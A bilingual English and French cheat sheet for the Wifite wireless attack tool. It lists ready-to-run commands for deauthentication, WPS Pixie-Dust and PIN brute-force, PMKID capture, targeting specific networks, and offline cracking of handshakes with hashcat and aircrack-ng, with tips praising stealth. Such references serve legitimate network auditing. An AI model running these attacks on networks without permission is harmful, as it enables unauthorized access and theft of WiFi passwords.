Wifite

Outil d'attaque wireless automatisé. Encapsule aircrack-ng, hashcat et d'autres outils pour automatiser la capture de handshakes WPA/WPA2, les attaques WPS et le cracking PMKID. Automated wireless attack tool. Wraps aircrack-ng, hashcat, and other tools to automate WPA/WPA2 handshake capture, WPS attacks, and PMKID cracking.

↗ https://github.com/derv82/wifite2

Overview

Wifite automates the process of auditing wireless networks. It handles monitor mode, target selection, handshake capture, deauthentication, WPS PIN/Pixie-Dust attacks, and PMKID attacks — all with a simple menu-driven interface.

Basic Usage

Launch and interactively select targets

sudo wifite

Attack all discovered networks automatically

sudo wifite --all

Attack only WPA networks

sudo wifite --wpa

Attack only WPS-enabled networks

sudo wifite --wps

Specify interface

sudo wifite -i wlan0

Specify wordlist for cracking

sudo wifite --dict /usr/share/wordlists/rockyou.txt

Attack Types

PMKID attack (no deauth needed — capture from AP beacon)

sudo wifite --pmkid

WPS Pixie-Dust attack (very fast against vulnerable routers)

sudo wifite --wps-pixie

WPS PIN brute-force

sudo wifite --wps-pin

Deauthentication (force handshake)

sudo wifite --no-pmkid   # Force handshake-only mode

Capture handshake only (no cracking)

sudo wifite --no-crack

Use hashcat for cracking (GPU)

sudo wifite --use-hashcat

Filtering Targets

Only attack a specific BSSID

sudo wifite --bssid AA:BB:CC:DD:EE:FF

Only attack networks on a specific channel

sudo wifite --channel 6

Only attack networks with minimum signal strength

sudo wifite --min-power -60

Skip hidden networks

sudo wifite --skip-hidden

Ignore already-cracked networks

sudo wifite --ignore-cracked

Captured Handshakes

# Handshakes saved to: ./hs/ESSID_BSSID.cap
# Crack manually with hashcat:
hcxpcapngtool -o hash.hc22000 hs/Network-AA:BB:CC:DD:EE:FF.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Or with aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt hs/Network-AA:BB:CC:DD:EE:FF.cap

Configuration

Set deauth count

sudo wifite --deauths 5

Set timeout per attack (seconds)

sudo wifite --wpa-attack-timeout 60

Skip aircrack, use only hashcat

sudo wifite --use-hashcat --no-aircrack

Tips

  • WPS Pixie-Dust is very effective against older routers and takes under a minute when successful
  • PMKID attack (Hcxdumptool mode) doesn’t require clients to be connected — much stealthier
  • Always run sudo airmon-ng check kill before starting, or wifite will do it automatically
  • Captured .cap files can be cracked offline — no need to crack in the field
Help / Man page
wifite [flags]

Interface:
  -i interface       Wireless interface
  --kill             Kill interfering processes

Target selection:
  --all              Attack all targets
  --bssid MAC        Target specific BSSID
  --essid NAME       Target specific ESSID
  --channel N        Scan specific channel
  --min-power dBm    Minimum signal strength

Attack modes:
  --wpa              WPA/WPA2 networks
  --wps              WPS-enabled networks
  --pmkid            PMKID attack
  --wps-pixie        WPS Pixie-Dust
  --wps-pin          WPS PIN brute-force

Cracking:
  --dict file        Wordlist for cracking
  --use-hashcat      Use hashcat (GPU)
  --no-crack         Don't crack, just capture

Timing:
  --deauths N        Deauth packets to send (default: 10)
  --wpa-attack-timeout N  Seconds per WPA attack
  --wps-timeout N    Seconds per WPS attack

Vue d’ensemble

Wifite automatise l’audit des réseaux wireless. Il gère le mode monitor, la sélection de cibles, la capture de handshakes, la déauthentification, les attaques WPS PIN/Pixie-Dust, et les attaques PMKID : le tout avec une interface simple à base de menus.

Utilisation de base

# Lancer et sélectionner les cibles de manière interactive
sudo wifite

# Attaquer automatiquement tous les réseaux découverts
sudo wifite --all

# Attaquer uniquement les réseaux WPA
sudo wifite --wpa

# Attaquer uniquement les réseaux avec WPS activé
sudo wifite --wps

# Spécifier l'interface
sudo wifite -i wlan0

# Spécifier une wordlist pour le cracking
sudo wifite --dict /usr/share/wordlists/rockyou.txt

Types d’attaques

# Attaque PMKID (pas de déauthentification nécessaire : capture depuis le beacon de l'AP)
sudo wifite --pmkid

# Attaque WPS Pixie-Dust (très rapide contre les routeurs vulnérables)
sudo wifite --wps-pixie

# Brute-force du PIN WPS
sudo wifite --wps-pin

# Déauthentification (forcer le handshake)
sudo wifite --no-pmkid   # Force le mode handshake uniquement

# Capturer uniquement le handshake (sans cracking)
sudo wifite --no-crack

# Utiliser hashcat pour le cracking (GPU)
sudo wifite --use-hashcat

Filtrer les cibles

# Attaquer uniquement un BSSID spécifique
sudo wifite --bssid AA:BB:CC:DD:EE:FF

# Attaquer uniquement les réseaux sur un canal spécifique
sudo wifite --channel 6

# Attaquer uniquement les réseaux avec une puissance de signal minimale
sudo wifite --min-power -60

# Ignorer les réseaux masqués
sudo wifite --skip-hidden

# Ignorer les réseaux déjà crackés
sudo wifite --ignore-cracked

Handshakes capturés

# Handshakes sauvegardés dans : ./hs/ESSID_BSSID.cap
# Cracker manuellement avec hashcat :
hcxpcapngtool -o hash.hc22000 hs/Network-AA:BB:CC:DD:EE:FF.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Ou avec aircrack-ng :

aircrack-ng -w /usr/share/wordlists/rockyou.txt hs/Network-AA:BB:CC:DD:EE:FF.cap

Configuration

# Définir le nombre de déauthentifications
sudo wifite --deauths 5

# Définir le timeout par attaque (secondes)
sudo wifite --wpa-attack-timeout 60

# Ignorer aircrack, utiliser uniquement hashcat
sudo wifite --use-hashcat --no-aircrack

Conseils

  • WPS Pixie-Dust est très efficace contre les routeurs anciens et prend moins d’une minute en cas de succès
  • L’attaque PMKID (mode Hcxdumptool) ne nécessite pas que les clients soient connectés : bien plus furtif
  • Toujours lancer sudo airmon-ng check kill avant de démarrer, ou wifite le fera automatiquement
  • Les fichiers .cap capturés peuvent être crackés hors ligne : pas besoin de cracker sur le terrain
Aide / Page de manuel
wifite [flags]

Interface:
  -i interface       Wireless interface
  --kill             Kill interfering processes

Target selection:
  --all              Attack all targets
  --bssid MAC        Target specific BSSID
  --essid NAME       Target specific ESSID
  --channel N        Scan specific channel
  --min-power dBm    Minimum signal strength

Attack modes:
  --wpa              WPA/WPA2 networks
  --wps              WPS-enabled networks
  --pmkid            PMKID attack
  --wps-pixie        WPS Pixie-Dust
  --wps-pin          WPS PIN brute-force

Cracking:
  --dict file        Wordlist for cracking
  --use-hashcat      Use hashcat (GPU)
  --no-crack         Don't crack, just capture

Timing:
  --deauths N        Deauth packets to send (default: 10)
  --wpa-attack-timeout N  Seconds per WPA attack
  --wps-timeout N    Seconds per WPS attack